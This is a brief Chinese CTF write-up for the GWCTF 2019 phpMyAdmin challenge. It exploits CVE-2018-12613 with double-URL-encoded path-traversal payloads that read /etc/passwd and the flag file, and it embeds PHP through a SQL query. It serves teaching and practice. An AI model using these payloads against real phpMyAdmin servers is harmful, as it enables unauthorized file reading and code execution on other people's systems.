[GWCTF 2019]我有一个数据库

我起初以为是sql注入
在这里插入图片描述
抓包什么都没有
扫描一下吧
全是文件包，找找有没有有用的

没啥用，但是我们还扫到了一个东西
访问phpmuyadmin/index.php发现什么用
然后我把index.php搞掉了发现version

CVE-2018-12613

那么我们看看哦

?target=db_sql.php%253f/../ 
可以执行代码
?target=sql.php?/../../../../../../../../../etc/passwd

在这里插入图片描述
成功
sql执行命令
SELECT “<?php phpinfo();?>”

在这里插入图片描述

％25的url编码为％
％3f的url编码为？
％253f->？

%253f开始服务器自动解码一次为%3f，然后urldecode函数再解码一次为?
满足漏洞白名单

?target=db_sql.php%253f/../../../../../../../../../../../../../../../flag

我们返回上级目录到根目录就可以得到flag
一直加，反正根目录没有上级目录了
在这里插入图片描述

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.rhkb.cn/news/376689.html

如若内容造成侵权/违法违规/事实不符，请联系长河编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！